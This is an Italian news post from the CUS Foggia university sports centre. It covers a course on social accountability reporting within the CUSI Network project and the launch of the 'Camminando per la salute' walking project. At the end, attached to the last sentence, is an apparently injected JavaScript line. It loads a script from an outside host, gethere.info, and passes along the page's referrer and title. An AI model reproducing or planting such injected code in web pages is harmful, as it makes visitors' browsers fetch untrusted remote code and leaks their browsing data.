Progetto “Cusi Network” – “Bilancio sociale: dalla teoria al modello CUSI”
In partenza il nuovo progetto C.U.S.I. “Camminando per la salute” in collaborazione con i CUS locali
A partire dal mese di novembre 2013 e fino al mese di giugno 2014 alcuni consiglieri e collaboratori del C.U.S. Foggia hanno partecipato attivamente alle lezioni del corso di formazione organizzato dal C.U.S.I dal titolo “Bilancio sociale: dalla teoria al modello CUSI”. Tale attività è rientrata nel progetto “CusiNetwork” finanziato dal Ministero del Lavoro e delle Politiche Sociali, tramite i fondi della L. 383/2000 per l’associazionismo sociale. L’obiettivo del progetto è stato quello di migliorare la capacità di rendicontazione sociale (bilancio sociale) dei C.U.S.,dotandoli di strumenti che, accanto ai risultati economici, diano conto anche dei risultati sociali delle loro attività sportive, ricreative e culturali.
Il bilancio sociale è uno strumento di accountability, ossia di rendicontazione sociale delle responsabilità, dei comportamenti e dei risultati sociali delle attività svolte da un’organizzazione. Ha una funzione integrativa rispetto alle informazioni fornite con il bilancio di esercizio e, pur essendo a norma di legge facoltativo per le associazioni, ha assunto nella prassi una valenza quasi normativa per le organizzazioni più grandi e complesse. Il bilancio sociale è un documento pubblico, che viene adottato per “dare conto” del proprio agire alle varie persone interessate (dette stakeholder), che possono essere sia interne (soci, dipendenti, volontari, collaboratori, ecc.) sia esterne (donatori, enti pubblici, enti privati, simpatizzanti, ecc.).
In particolare, il progetto ha anche previsto lo sviluppo e l’implementazione di un sistema informativo viaweb di raccolta e condivisione dei dati necessari alla redazione del bilancio sociale. In questo modo tutti i C.U.S. potranno contribuire alla stesura del bilancio sociale inserendo all’interno del sistema i dati relativi alle proprie attività, che verranno automaticamente visualizzati ed elaborati dalla sede di Roma e che saranno a disposizione dei Centri locali per una rielaborazione valutativa e programmatica.
L’obiettivo del corso è stato, inoltre, quello di creare delle occasioni di incontro e confronto tra gli operatori attivi presso i C.U.S., coinvolgendoliin un processo partecipato di costruzione degli strumenti di rendicontazione sociale e quindi anche di valutazione e programmazione. Il bilancio sociale, infatti, non ha una struttura predefinita come quello economico, ma lascia spazio alla libera scelta della singola organizzazione rispetto a quali contenuti inserire. Volontà del C.U.S.I. è stata di far partecipare il maggior numero di operatori possibile a tale scelta, pensandola come un’occasione per dare valore alla voce “dal campo” di chi quotidianamente porta avanti sui territori i C.U.S. locali.
Nuovo progetto CUSI “Camminando per la salute”:
Il 14 giugno 2014, a conclusione dei lavori di gruppo CUS e di stesura finale CUSI è stato così presentato a Roma, alla presenza di tutti i CUS, il bilancio sociale del CUSI 2013. Nell’occasione è stato presentato e illustrato anche l’avvio del nuovo progetto “Camminando per la salute” promosso dalla Giunta esecutiva del CUSI e predisposto dal Presidente della Commissione Sanitaria dr. Gianfranco Beltrami, che nei prossimi mesi coinvolgerà operativamente i territori dei singoli CUS d’Italia. In linea con l’iniziativa del nuovo progettoCUSI anche l’intervento nell’occasione del nostro presidente Prof. Dario Colella forte sostenitore dello sviluppo di tali attività fisiche tra gli studenti attraverso la costituzione ad esempio di “gruppi di cammino” o altro ancora.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;